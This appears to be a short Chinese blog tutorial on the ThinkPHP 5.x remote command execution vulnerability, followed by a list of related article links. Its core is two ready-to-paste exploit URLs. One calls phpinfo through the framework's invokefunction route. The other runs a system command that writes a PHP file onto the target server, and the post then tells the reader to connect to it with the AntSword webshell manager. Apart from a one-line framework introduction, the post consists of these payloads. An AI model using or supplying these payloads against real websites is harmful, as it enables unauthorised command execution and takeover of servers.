常见框架漏洞:Thinkphp(TP)篇

简介

ThinkPHP (简称 TP )是一款流行的 国产开源 PHP 框架 ,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

相关推荐
奔跑吧邓邓子6 天前
PHPStorm携手ThinkPHP8:开启高效开发之旅
phpstorm·php开发·thinkphp·thinkphp8
远方2357 天前
Android无需授权直接访问Android/data目录漏洞
android·安全·文件·漏洞·目录·权限
浮江雾10 天前
XXE漏洞1-XXE 漏洞简介-XML 语法-DTD 讲解-外部实体讲解
xml·安全·web安全·漏洞·xxe
centaury3213 天前
使用FastAdmin框架开发二
uniapp·thinkphp·fastadmin
quweiie14 天前
tp8.0\jwt接口安全验证
前端·安全·jwt·thinkphp
IT 青年14 天前
Windows 用户账户控制(UAC)绕过漏洞
漏洞
IT 青年16 天前
HTTP请求走私漏洞
漏洞
未来之窗软件服务1 个月前
thinkphp ThinkPHP3.2.3完全开发手册
thinkphp
智云软件测评服务1 个月前
Web应用安全漏洞扫描:原理、常用方法及潜在风险解析?
应用·漏洞·扫描
网安INF2 个月前
CVE-2024-23897源码分析与漏洞复现(Jenkins 任意文件读取)
java·web安全·网络安全·jenkins·漏洞